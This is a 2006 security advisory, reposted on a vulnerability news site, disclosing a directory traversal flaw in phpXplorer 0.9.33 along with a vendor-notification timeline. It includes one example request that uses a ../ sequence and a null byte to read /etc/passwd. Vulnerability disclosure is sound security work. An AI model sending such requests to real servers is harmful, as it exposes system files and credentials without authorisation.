Computer Security

Security Advisory: Directory traversal in phpXplorer
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA18454] SMBCMS Site Search Cross-Site Scripting Vulnerability

  [SA18519] CubeCart Cross-Site Scripting Vulnerabilities

  [SA18459] PDFdirectory SQL Injection Vulnerabilities

  [SA18465] Trac HTML WikiProcessor Script Insertion Vulnerability

From:Oriol Torrent Santiago <oriol.torrent_(at)_gmail.com>
Date:17.01.2006
Subject:Directory traversal in phpXplorer

==========================================================
Title: Directory traversal in phpXplorer

Application: phpXplorer
Vendor: http://www.phpxplorer.org
Vulnerable Versions: 0.9.33
Bug: directory traversal
Date: 16-January-2006
Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >

References:
http://www.arrelnet.com/advisories/adv20060116.html

==========================================================

1) Background
  -----------
 phpXplorer is an open source file management system written in PHP.
 It enables you to work on a remote file system through a web browser.


2) Problem description
  --------------------
  An attacker can read arbitrary files outside the web root by sending
  specially formed requests

 Ex:
 
http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../..
/etc/passwd%00&ref=1


3) Solution:
  ----------
  No Patch available.


4) Timeline
  ---------
  17/12/2005 Bug discovered
  20/12/2005 Vendor receives detailed advisory. No response
  04/01/2006 Second notification. No response
  16/01/2006 Public Disclosure
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru